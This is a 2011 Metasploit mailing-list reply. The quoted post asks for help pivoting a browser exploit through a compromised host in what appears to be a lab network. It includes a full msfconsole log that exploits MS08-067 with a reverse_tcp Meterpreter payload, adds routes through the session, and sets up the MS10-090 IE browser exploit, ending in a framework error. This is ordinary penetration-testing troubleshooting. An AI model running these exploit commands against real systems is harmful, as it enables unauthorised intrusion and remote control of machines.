Metasploit mailing list archives

Re: Unable to start Web Browser exploit on pivoted host


From: Sagar Belure <sagar.belure () gmail com>
Date: Sat, 22 Jan 2011 19:21:20 +0530

On Fri, Jan 21, 2011 at 11:51 PM, Hauke Mehrtens <hauke () hauke-m de> wrote:
I want to start an msf web server with a browser exploit on an already
exploited host to exploit more hosts in the internal network visiting its
website.

My network configuration looks like this:
Host A ----------------- Host P --------------- Host V
(Attacker)              (Pivoted)               (Victim)
192.168.56.1/24         192.168.56.3/24
                        192.168.57.4/24         192.168.57.3/24
Ubuntu 10.10            Windows 2003 R2 SP2     Windows XP

I am the attacker (Host A) and got a meterpreter session on the pivoted
Host P. Now I want to start some web browser exploit to exploit Host V
when it accesses this website. But when doing so I get the following
error message:

[-] Exploit exception: undefined method `on_client_connect_proc=' for #<Rex::Post::Meterpreter::Extensions::Stdapi::Net::SocketSubsystem::TcpServerChannel:0x7fcac33318b0>

The Host V does not have a direct network connection to the attacker.
When starting the msf web server with the browser exploit on a local
network interface on Host A, everything works as expected.

This was done on Ubuntu 10.10 amd64 and i386 with the msf version from
today. This was done with and without root rights.

If this is normal behavior and should not work, how do I forward an
open port on the Host P to a web server on Host A so that Host V can
access the browser exploit?

This resembles the case I had taken while presenting this:
http://sec-ur-way.blogspot.com/2010/11/nu-delhi-presentations-post.html

Hope that helps.


Hauke


Here is the complete log with the things I did in Metasploit.

msf > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.3
RHOST => 192.168.56.3
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.56.3     yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  thread           yes       Exit technique: seh, thread, none, process
  LHOST     192.168.56.1     yes       The listen address
  LPORT     4444             yes       The listen port


Exploit target:

  Id  Name
  --  ----
  0   Automatic Targeting


msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 R2 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.56.3
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:1030) at Fri Jan 21 19:05:30 +0100 2011
[*] AutoAddRoute: Routing new subnet 192.168.56.0/255.255.255.0 through session 1
[*] AutoAddRoute: Routing new subnet 192.168.57.0/255.255.255.0 through session 1
[-] The 'stdapi' extension has already been loaded.

meterpreter > background
msf exploit(ms08_067_netapi) > use windows/browser/ms10_090_ie_css_clip
msf exploit(ms10_090_ie_css_clip) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_090_ie_css_clip) > set SRVHOST 192.168.57.4
SRVHOST => 192.168.57.4
msf exploit(ms10_090_ie_css_clip) > set LHOST 192.168.57.4
LHOST => 192.168.57.4
msf exploit(ms10_090_ie_css_clip) > set URIPATH /
URIPATH => /
msf exploit(ms10_090_ie_css_clip) > show options

Module options (exploit/windows/browser/ms10_090_ie_css_clip):

  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SRVHOST     192.168.57.4     yes       The local host to listen on.
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH     /                no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  process          yes       Exit technique: seh, thread, none, process
  LHOST     192.168.57.4     yes       The listen address
  LPORT     4444             yes       The listen port


Exploit target:

  Id  Name
  --  ----
  0   Automatic


msf exploit(ms10_090_ie_css_clip) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.57.4:4444 via the meterpreter on session 1
[-] Exploit exception: undefined method `on_client_connect_proc=' for #<Rex::Post::Meterpreter::Extensions::Stdapi::Net::SocketSubsystem::TcpServerChannel:0x7fcac33318b0>
msf exploit(ms10_090_ie_css_clip) >

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework




-- 
Thanks,
Sagar Belure
Security Analyst
Secfence Technologies
www.secfence.com